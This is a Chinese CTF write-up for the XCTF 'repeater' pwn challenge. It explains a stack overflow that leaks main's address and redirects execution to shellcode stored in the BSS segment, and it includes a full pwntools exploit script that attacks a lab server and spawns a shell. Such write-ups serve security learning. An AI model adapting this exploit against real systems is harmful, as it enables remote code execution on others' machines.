标签：攻防 repeater addr 题解 地址 sh main shellcode 输入

攻防世界 repeater 题解

查看程序保护情况，开启了PIE，没开NX，RELRO全开。

在ida64中打开分析程序，这道题程序比较简单。可以发现的信息如下：

• 字符数组s大小为0x20，但可以读入0x40的长度，起始于rbp-30h处（见红框）

• 变量v5可以控制循环、条件控制输出main函数地址，该变量位于rbp-20h字符数组s空间后（见粉框）

• 通过字符串s溢出可控制变量v5的值及函数返回地址

• 程序运行起始可输入数据到内存BSS段（见蓝框）

根据这些信息，这道题的思路就出来了：

1. 程序起始运行，提示输入name时，输入一段shellcode（将存储到byte_202040处）

2. 通过字符串s溢出控制变量v5的值为3281697，从而泄露出main函数地址

3. 通过main函数地址及byte_202040与main地址偏移，获得shellcode代码地址

4. 构造溢出输入，覆盖返回地址，使程序跳转到shellcode执行，获得系统shell

这道题还是非常简单的，只是我在做的时候shellcode没选对，导致一直没利用成功（忘记改arch值）。

下面是这道题的完整代码：

from pwn import * 

sh = remote('61.147.171.105',50187)

# 通过输入name向BSS段写入shellcode
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())
sh.sendlineafter('name :',shellcode)

# 通过输入内容溢出修改控制变量值，泄露main地址
num = 3281697
payload = b'A'*0x20 + p64(num)
sh.sendlineafter('input :',payload)
sh.recvuntil('you :\n0x')
main_addr = int(sh.recv(12),16)

# 再次通过输入内容溢出，将函数返回地址改为shellcode地址
shellcode_addr = main_addr + 0x202040 - 0xa33
payload2 = b'A'*0x20 + p64(0x1) + b'B'*16 + p64(shellcode_addr)
sh.sendlineafter('input :',payload2)
sh.interactive()

执行结果如图：

标签：攻防,repeater,addr,题解,地址,sh,main,shellcode,输入
来源： https://www.cnblogs.com/C0ngvv/p/16658316.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。